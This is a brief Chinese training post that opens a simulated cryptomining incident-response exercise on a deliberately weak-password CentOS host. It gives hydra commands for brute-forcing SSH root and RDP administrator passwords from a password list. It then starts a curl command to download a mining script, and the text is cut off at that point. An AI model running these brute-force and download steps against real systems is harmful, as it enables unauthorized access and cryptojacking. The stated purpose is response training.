前言:第三期接近尾声了,因为培训(其实主要是企业有这个应急响应的技能要求)的原则是尽量贴近实际的需要,所以模拟了一次挖矿病毒应急响应。顺便说一句:第四期3月18号开始。
环境:Centos..70.(开启ssh,设置弱口令)
0x01.SSH爆破tips
LinuxSSH口令破解:hydra目标ipssh-lroot-Ppass.txt-V
windowsRDP口令破解:hydra目标iprdp-ladministrator-Ppass.txt-V
成功获取口令之后登陆下载挖矿脚本。
(curl-fsSL